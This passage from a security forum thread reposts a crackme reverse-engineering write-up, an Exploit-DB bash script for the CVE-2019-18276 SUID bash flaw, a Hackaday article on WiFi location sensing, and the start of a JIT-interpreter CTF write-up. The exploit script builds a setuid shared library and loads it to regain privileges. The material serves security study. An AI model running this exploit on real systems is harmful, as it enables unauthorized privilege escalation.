[var_804h] ╎│ 0x555ef9f54fa0 movsxd rdx, eax ╎│ 0x555ef9f54fa3 mov rax, qword [var_718h] ╎│ 0x555ef9f54faa add rax, rdx ╎│ 0x555ef9f54fad mov edx, dword [var_804h] ╎│ 0x555ef9f54fb3 lea ecx, [rdx + 9] ╎│ 0x555ef9f54fb6 movzx edx, byte [rax] ╎│ 0x555ef9f54fb9 movsxd rax, ecx ╎│ 0x555ef9f54fbc mov byte [rbp + rax - 0x14], dl ╎│ 0x555ef9f54fc0 add dword [var_804h], 1 ╎│ ; CODE XREF from main @ 0x555ef9f54f98 ╎└─> 0x555ef9f54fc7 cmp dword [var_804h], 2 └──< 0x555ef9f54fce jle 0x555ef9f54f9a 0x555ef9f54fd0 lea rdx, [var_20h] 0x555ef9f54fd4 lea rax, [var_14h] 0x555ef9f54fd8 mov rsi, rdx 0x555ef9f54fdb mov rdi, rax 0x555ef9f54fde call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2) 0x555ef9f54fe3 test eax, eax ┌─< 0x555ef9f54fe5 jne 0x555ef9f54ff5 │ 0x555ef9f54fe7 lea rdi, str.It_seems_to_me__that_you_are_home ; 0x555ef9f55268 ; "It seems to me, that you are home!" 
│ 0x555ef9f54fee call sym.imp.puts ; int puts(const char *s) ┌──< 0x555ef9f54ff3 jmp 0x555ef9f55001 │└─> 0x555ef9f54ff5 lea rdi, str.Not_all_those_who_wander_are_lost__although_it_seems_you_are ; 0x555ef9f55290 ; "Not all those who wander are lost, although it seems you are!" │ 0x555ef9f54ffc call sym.imp.puts ; int puts(const char *s) │ ; CODE XREF from main @ 0x555ef9f54ff3 └──> 0x555ef9f55001 mov eax, 0 0x555ef9f55006 mov rcx, qword [var_8h] 0x555ef9f5500a xor rcx, qword fs:[0x28] ┌─< 0x555ef9f55013 je 0x555ef9f5501a │ 0x555ef9f55015 call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void) └─> 0x555ef9f5501a leave └ 0x555ef9f5501b ret Note that the comments and arrows are added by Radare2. The first part of the code contains the function prologue, sets the values of argc and argv, prints the riddle via puts and printf, and takes the user input via scanf. 0x555ef9f548ca push rbp 0x555ef9f548cb mov rbp, rsp 0x555ef9f548ce sub rsp, 0x820 0x555ef9f548d5 mov dword [var_814h], edi ; argc 0x555ef9f548db mov qword [var_820h], rsi ; argv 0x555ef9f548e2 mov rax, qword fs:[0x28] 0x555ef9f548eb mov qword [var_8h], rax 0x555ef9f548ef xor eax, eax 0x555ef9f548f1 lea rdi, str.If_up_is_down__then_where_are_you_now ; 0x555ef9f550a8 ; "If up is down, then where are you now?" 0x555ef9f548f8 call sym.imp.puts ; int puts(const char *s) 0x555ef9f548fd lea rdi, str.I_am: ; 0x555ef9f550cf ; "I am: " 0x555ef9f54904 mov eax, 0 0x555ef9f54909 call sym.imp.printf ; int printf(const char *format) 0x555ef9f5490e lea rax, [var_20h] 0x555ef9f54912 mov rsi, rax 0x555ef9f54915 lea rdi, [0x555ef9f550d6] ; "%s" 0x555ef9f5491c mov eax, 0 0x555ef9f54921 call sym.imp.__isoc99_scanf ; int scanf(const char *format) Note that this is a 64-bit binary, meaning that the first few arguments are passed via registers instead of the stack. The time that the program takes after the user input is not because it decrypts anything, but because the sleep function is called with 3 as an argument. The argument is the amount of seconds that the program should sleep. After that, there are a lot of variable declarations. In the disassembly below, these are omitted to improve the readability of the code. 0x555ef9f54926 mov edi, 3 0x555ef9f5492b call sym.imp.sleep ; int sleep(int s) ;omitted variable initialisations When the 3 second sleep is over, more variables are set. After that the current time since epoch is requested. The result of this is stored in eax. The value of eax is then moved into edi, where the current time is used as a seed for the random function. 0x555ef9f54ea1 mov qword [var_4d8h], rax 0x555ef9f54ea8 mov dword [var_800h], 4 0x555ef9f54eb2 mov dword [var_7fch], 0x12c ; 300 0x555ef9f54ebc mov edi, 0 0x555ef9f54ec1 call sym.imp.time ; time_t time(time_t *timer) 0x555ef9f54ec6 mov edi, eax 0x555ef9f54ec8 call sym.imp.srand ; void srand(int seed) A couple of other variables are then set, where one instruction is different from the majority that is encountered. At 0x555ef9f54eeb, only a single byte is moved. The value 0xa is also equal to a newline character. 0x555ef9f54ecd mov dword [var_804h], 0 0x555ef9f54ed7 mov dword [var_7f8h], 0x29 ; ')' ; 41 0x555ef9f54ee1 mov dword [var_7f4h], 3 0x555ef9f54eeb mov byte [var_9h], 0xa After that, a loop is encountered. At first, the variable var_804h is set to 0, making it likely that this variable is used as the counter, or i in the original source code. The unconditional jump downards moves i into eax. If eax is less than the value of var_7f4h, the upwards jump is taken again. 
Just above the loop, var_7f4h is set to equal 3. This means that this loop will iterate three times before the execution continues. The code is given below. 0x555ef9f54eef mov dword [var_804h], 0 ┌─< 0x555ef9f54ef9 jmp 0x555ef9f54f24 ┌──> 0x555ef9f54efb mov eax, dword [var_804h] ╎│ 0x555ef9f54f01 movsxd rdx, eax ╎│ 0x555ef9f54f04 mov rax, qword [var_788h] ╎│ 0x555ef9f54f0b add rax, rdx ╎│ 0x555ef9f54f0e movzx edx, byte [rax] ╎│ 0x555ef9f54f11 mov eax, dword [var_804h] ╎│ 0x555ef9f54f17 cdqe ╎│ 0x555ef9f54f19 mov byte [rbp + rax - 0x14], dl ╎│ 0x555ef9f54f1d add dword [var_804h], 1 ╎│ ; CODE XREF from main @ 0x555ef9f54ef9 ╎└─> 0x555ef9f54f24 mov eax, dword [var_804h] ╎ 0x555ef9f54f2a cmp eax, dword [var_7f4h] └──< 0x555ef9f54f30 jl 0x555ef9f54efb Within the loop, the value of i is moved into eax, after which it is stored in rdx using the movsxd (Move With Sign Extension) instruction. The value that resides at var_788h is then moved into rax, and the value of i is added. The single byte that resides at the value of rax is moved into edx. The cdqe (Convert Doubleword to Quardword) instruction then increases the size. The value of dl is then stored at rbp plus rax minus 0x14. In other words, the value of dl is stored at base pointer plus the offset of the variable minus 0x14. At last, i is incremented with one. Based on the new value of i, the jump might or might not be taken. To simplify the explanation above, the value that is taken depends on the offset that is equal to i. When using arrays, i is often used to determine the offset within a loop. Note that the offset is used both when getting a value and setting a value. As such, one can rewrite the assembly code above into the C code that is given below. array1[i] = array2[i]; The address that var_14h points to is stored into eax, after which it is incremented with three. The value that resides at var_4e0h is then stored at rdx. Both values are then passed to the strcpy function, which copies the value of the second argument at the location that is stored in the first argument. Note that the offset of 3 is used when defining the destination of the strcpy function. The previous loop iterated for three times. 0x555ef9f54f32 lea rax, [var_14h] 0x555ef9f54f36 add rax, 3 0x555ef9f54f3a mov rdx, qword [var_4e0h] 0x555ef9f54f41 mov rsi, rdx 0x555ef9f54f44 mov rdi, rax 0x555ef9f54f47 call sym.imp.strcpy ; char *strcpy(char *dest, const char *src) The loop below is similar the the one that is observed above. It copies a variable into rbp + rax – 0x14, where rax is the iteration’s offset. This time, however, the offset starts at 6 before adding the value of the current iteration, which is stored in var_804h. 0x555ef9f54f4c mov dword [var_804h], 0 ┌─< 0x555ef9f54f56 jmp 0x555ef9f54f85 ┌──> 0x555ef9f54f58 mov eax, dword [var_804h] ╎│ 0x555ef9f54f5e movsxd rdx, eax ╎│ 0x555ef9f54f61 mov rax, qword [var_670h] ╎│ 0x555ef9f54f68 add rax, rdx ╎│ 0x555ef9f54f6b mov edx, dword [var_804h] ╎│ 0x555ef9f54f71 lea ecx, [rdx + 6] ╎│ 0x555ef9f54f74 movzx edx, byte [rax] ╎│ 0x555ef9f54f77 movsxd rax, ecx ╎│ 0x555ef9f54f7a mov byte [rbp + rax - 0x14], dl ╎│ 0x555ef9f54f7e add dword [var_804h], 1 ╎│ ; CODE XREF from main @ 0x555ef9f54f56 ╎└─> 0x555ef9f54f85 cmp dword [var_804h], 2 └──< 0x555ef9f54f8c jle 0x555ef9f54f58 Alternatively, one could use i and the hardcoded offset in pseudo code as follows: array1[i + 6] = array2[i]; Similar to the loop above, this loop performs the same action, but using a default offset of 9 instead of 6. 
0x555ef9f54f8e mov dword [var_804h], 0 ┌─< 0x555ef9f54f98 jmp 0x555ef9f54fc7 ┌──> 0x555ef9f54f9a mov eax, dword [var_804h] ╎│ 0x555ef9f54fa0 movsxd rdx, eax ╎│ 0x555ef9f54fa3 mov rax, qword [var_718h] ╎│ 0x555ef9f54faa add rax, rdx ╎│ 0x555ef9f54fad mov edx, dword [var_804h] ╎│ 0x555ef9f54fb3 lea ecx, [rdx + 9] ╎│ 0x555ef9f54fb6 movzx edx, byte [rax] ╎│ 0x555ef9f54fb9 movsxd rax, ecx ╎│ 0x555ef9f54fbc mov byte [rbp + rax - 0x14], dl ╎│ 0x555ef9f54fc0 add dword [var_804h], 1 ╎│ ; CODE XREF from main @ 0x555ef9f54f98 ╎└─> 0x555ef9f54fc7 cmp dword [var_804h], 2 └──< 0x555ef9f54fce jle 0x555ef9f54f9a The loops and string copy are used to create one string out of multiple others. The offset that increases with three every time, is used to determine where the new string should start. Two variables are then compared using the strcmp function. 0x555ef9f54fd0 lea rdx, [var_20h] 0x555ef9f54fd4 lea rax, [var_14h] 0x555ef9f54fd8 mov rsi, rdx 0x555ef9f54fdb mov rdi, rax 0x555ef9f54fde call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2) The return value of strcmp is then compared. If the two strings are equal, the success message is printed. If the two strings are not equal, the failure message is printed. The program then exits by returning zero, which is the exit code of a graceful exit. 0x555ef9f54fe3 test eax, eax ┌─< 0x555ef9f54fe5 jne 0x555ef9f54ff5 │ 0x555ef9f54fe7 lea rdi, str.It_seems_to_me__that_you_are_home ; 0x555ef9f55268 ; "It seems to me, that you are home!" │ 0x555ef9f54fee call sym.imp.puts ; int puts(const char *s) ┌──< 0x555ef9f54ff3 jmp 0x555ef9f55001 │└─> 0x555ef9f54ff5 lea rdi, str.Not_all_those_who_wander_are_lost__although_it_seems_you_are ; 0x555ef9f55290 ; "Not all those who wander are lost, although it seems you are!" │ 0x555ef9f54ffc call sym.imp.puts ; int puts(const char *s) │ ; CODE XREF from main @ 0x555ef9f54ff3 └──> 0x555ef9f55001 mov eax, 0 0x555ef9f55006 mov rcx, qword [var_8h] 0x555ef9f5500a xor rcx, qword fs:[0x28] ┌─< 0x555ef9f55013 je 0x555ef9f5501a │ 0x555ef9f55015 call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void) └─> 0x555ef9f5501a leave └ 0x555ef9f5501b ret To see when the two strings are equal, one can set a breakpoint on the strcmp function. By inspecting the arguments in the memory, one can see both the user input and the generated flag. The strcmp function resides at 0x555ef9f54fde. Within Radare2, one can set a breakpoint using db address (Debug Break) where address is the location of the breakpoint. As such, one has to issue the following command to set a breakpoint on the strcmp function: db 0x555ef9f54fde To continue execution until the breakpoint is hit, one uses the dc (Debug Continue) command. During the execution, one has to provide user input to the riddle in order to continue the execution. When the breakpoint is hit, the two arguments are located at rdx and rdi. Below, the argument set-up and function call to the strcmp function are given again. 0x555ef9f54fd0 lea rdx, [var_20h] 0x555ef9f54fd4 lea rax, [var_14h] 0x555ef9f54fd8 mov rsi, rdx 0x555ef9f54fdb mov rdi, rax 0x555ef9f54fde call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2) The variable names are based upon the offset compared to rbp. The location where all the loops wrote data to is located at rbp + rax – 0x14. In this case, rax was used to determine the offset into rbp – 0x14, which is also known as var_14h. As such, the variable var_14h contains the flag that was generated. The address of var_14h is stored in rax, after which it is moved into rdi. 
When the breakpoint is hit, one can use ps @ address to print the string at a given address or register. The result of ps @ rdi will provide the flag: D0wN_uN|)3r Dynamic analysis – tracing When tracing the binary, one will get to know information about the calls it makes without interfering with the binary itself. Given that the standard C library is used (based on the strings within the binary), one can assume that functions from this library are used to perform actions. As such, the GNU Linux ltrace (Library Trace) utility can be used. Below, an excerpt from the ltrace manual pages is given. ltrace is a program that simply runs the specified command until it exits. It intercepts and records the dynamic library calls which are called by the executed process and the signals which are received by that process. It can also intercept and print the system calls executed by the program. Starting the binary is simple: provide the path to ltrace as an argument and press enter. The output is given below. ltrace ./whereAmI.elf puts("If up is down, then where are yo"...If up is down, then where are you now? ) = 39 printf("I am: ") = 6 __isoc99_scanf(0x55799c2230d6, 0x7ffc8b93d7e0, 0, 0I am: The program then awaits the user input, as it normally would. The execution of the program is resumed normally after providing the user input, as can be seen below. __isoc99_scanf(0x55799c2230d6, 0x7ffc8b93d7e0, 0, 0I am: user_input ) = 1 sleep(3) = 0 time(0) = 1574117574 srand(0x5dd320c6, 0x7ffc8b93cfa0, 0, 0x7ff3ed5b29a4) = 0 strcpy(0x7ffc8b93d7ef, "N_u") = 0x7ffc8b93d7ef strcmp("D0wN_uN|)3r", "user_input") = -49 puts("Not all those who wander are los"...Not all those who wander are lost, although it seems you are! ) = 62 +++ exited (status 0) +++ As can be seen in the output, the program sleeps for 3 seconds, after which the current time is obtained. The random function is seeded, the string N_u is copied towards a specific address. The user input is then compared to D0wN_uN|)3r and the failure message is then written towards the output stream. This way, the flag is obtained without diassembling the binary. Static code analysis All default options were used when analysing the binary with Ghidra 9.0.2, as well as the Decompile Parameter ID option. Since Ghidra cannot find a main function, one will have to start at the entry function, which is given below. void entry(undefined8 param_1,undefined8 param_2,undefined8 param_3) { undefined8 in_stack_00000000; undefined auStack8 [8]; __libc_start_main(FUN_001008ca,in_stack_00000000,&stack0x00000008,FUN_00101020,FUN_00101090, param_3,auStack8); do { /* WARNING: Do nothing block with infinite loop */ } while( true ); } The __libc_start_main function requires multiple arguments. By default, the first argument is a pointer towards the main function. Double clicking on it will show the main function. The complete function is given below, after which it is analysed in parts. 
undefined8 FUN_001008ca(void) { int iVar1; time_t tVar2; long in_FS_OFFSET; int local_80c; char local_28 [12]; char local_1c [11]; undefined local_11; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); puts("If up is down, then where are you now?"); printf("I am: "); __isoc99_scanf(&DAT_001010d6,local_28); sleep(3); tVar2 = time((time_t *)0x0); srand((uint)tVar2); local_11 = 10; local_80c = 0; while (local_80c < 3) { local_1c[(long)local_80c] = (&DAT_0010110d)[(long)local_80c]; local_80c = local_80c + 1; } strcpy(local_1c + 3,"N_u"); local_80c = 0; while (local_80c < 3) { local_1c[(long)(local_80c + 6)] = (&DAT_00101198)[(long)local_80c]; local_80c = local_80c + 1; } local_80c = 0; while (local_80c < 3) { local_1c[(long)(local_80c + 9)] = (&DAT_00101145)[(long)local_80c]; local_80c = local_80c + 1; } iVar1 = strcmp(local_1c,local_28); if (iVar1 == 0) { puts("It seems to me, that you are home!"); } else { puts("Not all those who wander are lost, although it seems you are!"); } if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return 0; } The purpose of the function becomes clear near the end, where two strings are compared. Based on the comparison result (which is stored in iVar1), one of two possible strings is printed. If the two values are equal, the success message is printed. If they are not equal, the failure message is printed. One can rename iVar1 into comparisionResult. Within the loops above, the variable local_80c is used to keep track of the amount o fiterations. As such, this variable can be renamed into i. In the beginning, the program prints the riddle and requests the user input. The user input is stored in local_28, which can be renamed into userInput. Based on the two arguments of the string compare function, this means that local_1c is the generated flag. One can rename local_1c into generatedFlag After storing the user input, the program sleeps for 3 seconds. The current time since epoch is then stored in tVar2, after which it is used to seed the random function. One can rename tVar2 into currentTime, as can be seen below. puts("If up is down, then where are you now?"); printf("I am: "); __isoc99_scanf(&DAT_001010d6,userInput); sleep(3); currentTime = time((time_t *)0x0); srand((uint)currentTime); All the global variables are marked with DAT_*. All global variables within the loops are character arrays. By changing their type into char[3] using the T hotkey in the diassembly window, their literal value will be shown within the decompiler. The code below reflects all changes that have been made. 
undefined8 FUN_001008ca(void) { long lVar1; int comparisionResult; time_t currentTime; long in_FS_OFFSET; int i; char userInput [12]; char generatedFlag [11]; lVar1 = *(long *)(in_FS_OFFSET + 0x28); puts("If up is down, then where are you now?"); printf("I am: "); __isoc99_scanf(&DAT_001010d6,userInput); sleep(3); currentTime = time((time_t *)0x0); srand((uint)currentTime); i = 0; while (i < 3) { generatedFlag[(long)i] = "D0w"[(long)i]; i = i + 1; } strcpy(generatedFlag + 3,"N_u"); i = 0; while (i < 3) { generatedFlag[(long)(i + 6)] = "N|)"[(long)i]; i = i + 1; } i = 0; while (i < 3) { generatedFlag[(long)(i + 9)] = "3r"[(long)i]; i = i + 1; } comparisionResult = strcmp(generatedFlag,userInput); if (comparisionResult == 0) { puts("It seems to me, that you are home!"); } else { puts("Not all those who wander are lost, although it seems you are!"); } if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return 0; } Based on this, one can see how the flag is constructed. There are four variables that are concatenated into a single string to form the flag. The first three characters are copied into index zero through two within a loop. The next three characters are copied into index three through five using the strcpy function. The next two loops copy the last characters at different offsets. Each loop has an offset to ensure that the character that is copied, is placed at the correct location of the final string. One can simply copy and paste each part to form the flag: D0wN_uN|)3r. Challenge creation When creating a challenge, multiple methods to get the flag need to be possible whilst keeping a specific difficulty level in mind. In this case, the flag is not encrypted but spread out in multiple parts in no apparent order. Between the flag parts, there are a lot of unused variables of equal size to confuse the analyst. During runtime, the multiple flag parts are assembled in order, after which the user input is compared to the assembled flag. The length of each part, either part of the flag or a part of the garbage code to confuse the analyst, is 3 characters at most. This is done because the GNU Linux strings utility searches for strings that are at least four characters in size by default, as can be seen in the excerpt from the strings utility manual page. For each file given, GNU strings prints the printable character sequences that are at least 4 characters long (or the number given with the options below) and are followed by an unprintable character. By doing so, one cannot obtain the password by simply getting the strings from the binary. If one were to change the amount of characters to a smaller number, all the garbage strings will also show up. This provides some sort of a clue to the analyst, but it does not provide an answer. Due to the amount of garbage strings and the three second sleep after ingesting the user input, the application becomes infeasble to brute force. Using the current time to seed the random function is used to throw off analysts who are less certain of the analysis process. The variables are not used at all. The riddle is paired with the theme of Hackfest2019: upside down. The riddle asks where one is, if up is down. The event itself is hosted in Canada. Flipping the world map upside down, one can see that Canada would be at the place where Australia normally is. Note that one has to imagine the world map as a rectangle whilst turning it 180 degrees to the right. 
As such, one would be down under, or D0wN_uN|)3r in leetspeak. The full source of the challenge is given below. /* * File: whereAmI.c * Author: Max 'Libra' Kersten [@LibraAnalysis] * * Created on October 2, 2019, 9:06 PM */ #include <stdio.h> #include <stdlib.h> #include <time.h> #include <unistd.h> #include <string.h> /* * Flag: D0wN_uN|)3r */ int main(int argc, char *argv[]) { printf("If up is down, then where are you now?\n"); printf("I am: "); char userInput[12]; scanf("%s", userInput); sleep(3); char* trash0 = "DnF"; char* trash1 = "nIP"; char* trash2 = "zEZ"; char* trash3 = "uRC"; char* trash4 = "LgP"; char* trash5 = "cdM"; char* trash6 = "qeB"; char* trash7 = "xbI"; char* trash8 = "KPK"; char* trash9 = "jpb"; char* trash10 = "pWL"; char* trash11 = "NXs"; char* trash12 = "Ckx"; char* part1 = "D0w"; char* trash14 = "GXO"; char* trash15 = "RjK"; char* trash16 = "YbL"; char* trash17 = "VWC"; char* trash18 = "IWF"; char* trash19 = "gZF"; char* trash20 = "Lon"; char* trash21 = "ayh"; char* trash22 = "dGC"; char* trash23 = "MZI"; char* trash24 = "oPO"; char* trash25 = "wwK"; char* trash26 = "ySv"; char* part4 = "3r"; char* trash28 = "rOK"; char* trash29 = "HRE"; char* trash30 = "Qdw"; char* trash31 = "UIY"; char* trash32 = "XpQ"; char* trash33 = "MOP"; char* trash34 = "ayt"; char* trash35 = "zWI"; char* trash36 = "opG"; char* trash37 = "AnG"; char* trash38 = "hjs"; char* trash39 = "DeC"; char* trash40 = "lFO"; char* trash41 = "lLk"; char* trash42 = "kPe"; char* trash43 = "nJb"; char* trash44 = "hXE"; char* trash45 = "gIj"; char* trash46 = "NTx"; char* trash47 = "sHw"; char* part3 = "N|)"; char* trash49 = "UsC"; char* trash50 = "mkg"; char* trash51 = "hMI"; char* trash52 = "mBL"; char* trash53 = "lqU"; char* trash54 = "Cou"; char* trash55 = "AoM"; char* trash56 = "tBO"; char* trash57 = "ZAq"; char* trash58 = "rbo"; char* trash59 = "YOx"; char* trash60 = "JiX"; char* trash61 = "rhy"; char* trash62 = "lxq"; char* trash63 = "OOF"; char* trash64 = "AiJ"; char* trash65 = "fjz"; char* trash66 = "CKA"; char* trash67 = "Nbm"; char* trash68 = "qQV"; char* trash69 = "DSe"; char* trash70 = "ebQ"; char* trash71 = "Rwl"; char* trash72 = "Fia"; char* trash73 = "uyx"; char* trash74 = "sZz"; char* trash75 = "kfn"; char* trash76 = "jGG"; char* trash77 = "mwA"; char* trash78 = "TKW"; char* trash79 = "GWI"; char* trash80 = "KOl"; char* trash81 = "HMo"; char* trash82 = "aea"; char* trash83 = "ZPM"; char* trash84 = "JQd"; char* trash85 = "rqL"; char* trash86 = "dlY"; char* trash87 = "yBR"; char* trash88 = "eaz"; char* trash89 = "TTX"; char* trash90 = "ZGE"; char* trash91 = "SRc"; char* trash92 = "xxG"; char* trash93 = "jZY"; char* trash94 = "DCS"; char* trash95 = "chc"; char* trash96 = "SDe"; char* trash97 = "sRL"; char* part2 = "N_u"; char* trash99 = "jVl"; int argc2 = 4; int array[300]; int size = 300; srand(time(NULL)); int i = 0; int j = 41; int length = 3; char result[12]; result[11] = '\n'; i = 0; for (i; i < length; i++) { result[i] = part1[i]; } strcpy((result + 3), part2); for (i = 0; i < 3; ++i) { result[i + 6] = part3[i]; } for (i = 0; i < 3; ++i) { result[i + 9] = part4[i]; } if (strcmp(result, userInput) == 0) { printf("It seems to me, that you are home!\n"); } else { printf("Not all those who wander are lost, although it seems you are!\n"); } return (EXIT_SUCCESS); } Conclusion Both CTF challenges and malware can be analysed in a variety of ways. The approach one uses is partially based upon knowledge, partially based upon time, and partially based upon preference. 
Objectively, one method is not better than the other, although one might be quicker overall. To contact me, you can e-mail me at [info][at][maxkersten][dot][nl], send me a PM on Reddit, or DM me on Twitter @LibraAnalysis.

Source: https://maxkersten.nl/binary-analysis-course/assembly-basics/practical-case-crack-me-0x03/
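For readers who want to see only the flag-assembly logic from the source above, stripped of the trash variables, the sleep and the srand red herring, here is a distilled C sketch (not the original challenge code) that reproduces just the concatenation of the four parts:

    #include <stdio.h>
    #include <string.h>

    int main(void)
    {
        const char *part1 = "D0w", *part2 = "N_u", *part3 = "N|)", *part4 = "3r";
        char flag[12] = {0};

        for (int i = 0; i < 3; i++)          /* indices 0..2 */
            flag[i] = part1[i];
        strcpy(flag + 3, part2);             /* indices 3..5 */
        for (int i = 0; i < 3; i++)          /* indices 6..8 */
            flag[i + 6] = part3[i];
        for (int i = 0; i < 3; i++)          /* indices 9..11, also copies the NUL of "3r" */
            flag[i + 9] = part4[i];

        puts(flag);                          /* prints D0wN_uN|)3r */
        return 0;
    }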
  5. # Exploit Title : Bash 5.0 Patch 11 - SUID Priv Drop Exploit
# Date : 2019-11-29
# Original Author: Ian Pudney , Chet Ramey
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
# Version : < Bash 5.0 Patch 11
# Tested on Linux
# Credit : Ian Pudney from Google Security and Privacy Team based on Google CTF suidbash
# CVE : 2019-18276
# CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2019-18276 , https://www.youtube.com/watch?v=-wGtxJ8opa8
# Exploit Demo POC : https://youtu.be/Dbwvzbb38W0

Description : An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. By default, if Bash is run with its effective UID not equal to its real UID, it will drop privileges by setting its effective UID to its real UID. However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality, the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore regains privileges. However, binaries running with an effective UID of 0 are unaffected.

#!/bin/bash

#Terminal Color Codes
RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m'

#Get the Effective User ID (owner of the SUID /bin/bash binary)
read -p "Please enter effective user id (euid) : " euid

#Create a C file and output the exploit code
touch pwn.c
echo "" > pwn.c

cat <<EOT >> pwn.c
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>

void __attribute((constructor)) initLibrary(void) {
    printf("Escape lib is initialized");
    printf("[LO] uid:%d | euid:%d%c", getuid(), geteuid());
    setuid($euid);
    printf("[LO] uid%d | euid:%d%c", getuid(), geteuid());
}
EOT

echo -e "${RED}"
echo -e "Exploit Code copied to pwn.c !\n"
sleep 5
echo -e "Compiling Exploit Object ! \n"
$(which gcc ) -c -fPIC pwn.c -o pwn.o
sleep 5
echo -e "Compiling Exploit Shared Object ! \n"
$(which gcc ) -shared -fPIC pwn.o -o libpwn.so
sleep 5
echo -e "Exploit Compiled ! \n"
sleep 5
echo -e "Executing Exploit :) \n"
sleep 5

#Execute the Shared Library
echo -e "${RED}Run : ${NC} enable -f ./libpwn.so asd \n"

Source: https://www.exploit-db.com/exploits/47726?utm_source=dlvr.it&utm_medium=twitter
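When verifying the saved-UID behaviour described above on a test system, it can help to inspect all three UIDs rather than only getuid()/geteuid(). The following small helper is not part of the exploit; it is a Linux-specific sketch using glibc's getresuid() to print the real, effective and saved UIDs, so you can confirm that the saved UID still holds the binary owner's UID after bash has "dropped" privileges:

    #define _GNU_SOURCE
    #include <stdio.h>
    #include <unistd.h>

    /* Print real, effective and saved UIDs. On a vulnerable SUID bash
     * (CVE-2019-18276) the saved UID still holds the binary owner's UID
     * even though the effective UID was reset to the real UID. */
    int main(void)
    {
        uid_t ruid, euid, suid;
        if (getresuid(&ruid, &euid, &suid) != 0) {
            perror("getresuid");
            return 1;
        }
        printf("ruid=%d euid=%d suid=%d\n", (int)ruid, (int)euid, (int)suid);
        return 0;
    }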
6. Your WiFi Signals Are Revealing Your Location

by Sharon Lin, November 28, 2019

The home may be the hearth, but it's not going to be a place of safety for much longer. With the abundance of connected devices making their way into our homes, increasing levels of data may allow for more accurate methods of remote surveillance. By measuring the strength of ambient signals emitted from devices, a site can be remotely monitored for movement. That is to say, WiFi signals may soon pose a physical security vulnerability.

In a study from the University of Chicago and the University of California, Santa Barbara, researchers built on earlier studies where they could use similar techniques to "see through walls" to demonstrate a proof-of-concept for passive listening. Attackers don't need to transmit signals or break encryption to gain access to a victim's location – they just need to listen to the ambient signals coming from connected devices, making it more difficult to track bad actors down.

Typically, connected devices communicate with an access point such as a router rather than directly with the Internet. A person walking near a device can subtly change the signal propagated to the access point, which is picked up by a receiver sniffing the signal. Most building materials do not block WiFi signals from propagating, allowing receivers to be placed inconspicuously in different rooms from the access point. WiFi sniffers are relatively inexpensive, with models running for less than $20. They're also small enough to hide in unsuspected locations – inside backpacks, inside a box – and emit no signal that could be detected by a target.

The researchers proposed some methods for safeguarding against the vulnerability: insulating buildings against WiFi leakage (while ensuring that desirable signals, i.e. signals from cell towers, are still able to enter) or having access points emit a "cover signal" that mixes signals from connected devices to make it harder to sniff for motion.

While we may not be seeing buildings surrounded by Faraday cages anytime soon, there are only going to be more attack surfaces to worry about as our devices continue to become connected.

[Thanks to Qes for the tip!]

Sursa: https://hackaday.com/2019/11/28/your-wifi-signals-are-revealing-your-location/
7. [Redhat2019] Kaleidoscope

Posted on 2019-11-11 | Categorised under Hack

This is the third consecutive Red Hat Cup of Guangdong province that I have taken part in, and in terms of challenge quality it is clearly getting better each year. Besides being pleasantly surprised to see this Kaleidoscope challenge, I also couldn't help noticing how high the bar for domestic CTF competitions has become. As a challenge adapted from an interpreter, it is fairly difficult to solve through traditional reverse-engineering methods alone, so I'm sharing how fuzzing can be used to find the vulnerability, along with the subsequent analysis and exploitation.

This challenge is from a CTF competition in Guangdong province, China. It is a pwn challenge based on the llvm JIT engine. You can download this challenge at this link.

Recon

At first you may not be able to run this binary directly because of the missing library libLLVM-6.0.so.1; use sudo apt-get install libllvm6.0 to solve the dependency. It gives us an interpreter interface like:

ready> a = 1
ready> 1+1
Error: Unknown variable name
ready> a+1
Evaluated to 2
ready>

Drop the binary into IDA and we can see that it was written in C++, and that the designer turned on some optimization settings when compiling, so the decompiled result is really hard to follow. The symbols tell us this is a Kaleidoscope JIT interpreter, which is used by the llvm project as a tutorial to demonstrate how to implement a JIT interpreter. We can find the tutorial here: Building a JIT: Starting out with KaleidoscopeJIT, and the source code at llvm-kaleidoscope. The main function is clear in the source code:

int main() {
  BinopPrecedence['<'] = 10;
  BinopPrecedence['+'] = 20;
  BinopPrecedence['-'] = 20;
  BinopPrecedence['*'] = 40;
  fprintf(stderr, "ready> ");
  getNextToken();
  TheModule = llvm::make_unique<Module>("My awesome JIT", TheContext);
  MainLoop();
  TheModule->print(errs(), nullptr);
  return 0;
}

but in IDA it looks really terrible:

LLVMInitializeX86TargetInfo(*(_QWORD *)&argc, argv, envp);
LLVMInitializeX86Target();
LLVMInitializeX86TargetMC();
LLVMInitializeX86AsmPrinter();
LLVMInitializeX86AsmParser();
__k[0] = '=';
*std::map<char,int,std::less<char>,std::allocator<std::pair<char const,int>>>::operator[](&BinopPrecedence, __k) = 2;
__k[0] = '<';
*std::map<char,int,std::less<char>,std::allocator<std::pair<char const,int>>>::operator[](&BinopPrecedence, __k) = 10;
__k[0] = '+';
*std::map<char,int,std::less<char>,std::allocator<std::pair<char const,int>>>::operator[](&BinopPrecedence, __k) = 20;
__k[0] = '-';
*std::map<char,int,std::less<char>,std::allocator<std::pair<char const,int>>>::operator[](&BinopPrecedence, __k) = 20;
__k[0] = '*';
*std::map<char,int,std::less<char>,std::allocator<std::pair<char const,int>>>::operator[](&BinopPrecedence, __k) = 40;
v3 = &stderr;
fwrite("ready> ", 7uLL, 1uLL, stderr);
...

Comparing these two pieces of code, we can see the challenge defines = as a BinopPrecedence entry while the original version doesn't. I tried to follow the code but soon decided to switch to another method.

Fuzzing

So I turned to fuzzing, hoping to find some bugs. I first tried AFL in qemu mode to run this binary, but it got stuck during initialization. If you know how to run such a binary with AFL, please do let me know.

